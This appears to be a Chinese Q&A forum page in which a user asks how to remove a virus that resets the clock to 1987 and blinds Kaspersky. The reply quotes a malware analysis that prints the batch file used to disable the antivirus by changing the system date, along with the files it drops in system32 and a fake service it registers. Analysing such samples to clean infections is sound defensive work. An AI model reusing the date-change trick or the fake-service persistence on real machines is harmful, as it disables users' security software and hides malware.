改系统时间的病毒怎样杀啊?

来源:百度知道 编辑:UC知道 时间:2024/06/06 23:30:46
电脑中了病毒,每隔十分钟会把系统时间改为1987年,然后卡巴斯基就暂时失效,几秒钟后自动恢复。哪位大虾可以帮一下?

一个对付卡巴的病毒
卡巴的用户,系统时间全部改为1987-10-18

样本动作
判断用户机子是否装卡巴(KIS/KAV)
如果安装
释放
GoKaba.bat
文件内容
CODE:
@echo off
set date=%date%
date 1987-10-18
ping -n 45 localhost > nul
date %date%
del %0
[Copy to clipboard]

=>将系统时间调整为1987-10-18

卡巴的监控立刻失效

成功完成K.O.卡巴后
---------------------------------------------------------------------------------------------
以下为所有机子状况

释放文件
%SystemRoot%\system32\*.EXE
%SystemRoot%\system32\*T.EXE
%SystemRoot%\system32\*.DLL
%SystemRoot%\system32\delme.bat

* =随机8位字母(如7F9DE518\312E0FDA)

注册表变化
添加伪系统服务
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\* "DisplayName" = *

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\* "Description" = 为系统提供加速启动功能(d-sp1)。